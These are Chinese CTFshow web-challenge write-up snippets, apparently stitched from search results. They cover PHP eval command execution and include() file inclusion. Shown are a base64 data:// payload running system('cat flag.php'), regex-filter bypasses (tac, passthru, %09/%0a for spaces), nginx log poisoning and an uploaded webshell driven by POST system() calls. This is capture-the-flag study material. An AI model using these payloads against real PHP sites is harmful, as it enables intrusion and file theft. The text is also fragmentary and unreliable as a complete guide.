CTFshow WEB入门79 payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg== PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==即
web73:eval() 利用,正则绕过。 web74:eval() 利用,正则绕过。 web75:eval() 利用,正则绕过,PDO 利用。 web76:eval() 利用,正则绕过,PDO 利用。 web77:eval() 利用,正则绕过,伪协议glob://,FFI 利用。 web78:include() 利用,伪协议php://。 web79:include() 利用,伪协议data://。 web80:include(...
Web31: 多过滤cat,sort,shell,'.',空格,''' cat,sort可用其他查询命令,如tac,nl等;使用passthru绕过命令执行函数;'''单引号使用双引号绕过。 空格绕过可以写个脚本列出绕过空格的字符串一一进行尝试 """ %20 空格 %09 TAB(水平) %0a 新的一行 %0c 新的一页 %od return %ob TAB(...
实战演示ctfshow 文件包含 web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,不能通过php://filter,直接查看flag.php了,但是我们可以通过php://input或者data伪协议执...
web175 解法一 解法二 web176 解法一 解法二 web177 web 178 解法一 解法二 web179 ...
ctfshow_web入门 命令执行(全)——学习 命令执行 刚刚开始学习命令执行,萌新一个 因为是学习嘛,所以东西写的杂乱了 web 29 AI检测代码解析 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){...
ctfshow-web入门命令执行 web29 代码语言:javascript 代码运行次数:0 运行 AI代码解释 <?php/* \# -*- coding: utf-8 -*- \# @Author: h1xa \# @Date: 2020-09-04 00:12:34 \# @Last Modified by: h1xa \# @Last Modified time: 2020-09-04 00:26:48...
web78: data协议轻松解决 web79: data协议+正则匹配替换 web80: 遇到include+data过滤,原有方法失效: 考虑文件包含(include)的其他方法: 整体思路: 考虑通过代码中包含(include)已经存在的文件,如linux下的var/log/nginx/access.log日志文件,然后通过日志文件中的操作。
https://cfc70c23-fd28-45cf-b79f-5c80ebe03e70.challenge.ctf.show/ upload/1.php 连接密码(即post中所填内容): ws (2)直接通过hackbar发送post包利用php内置system()函数执行 post data:ws=system("ls ../"); post data:ws=system("tac ../flag.php"); ...
web31~过滤cat,空格 命令执行,需要严格的过滤 源码: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ...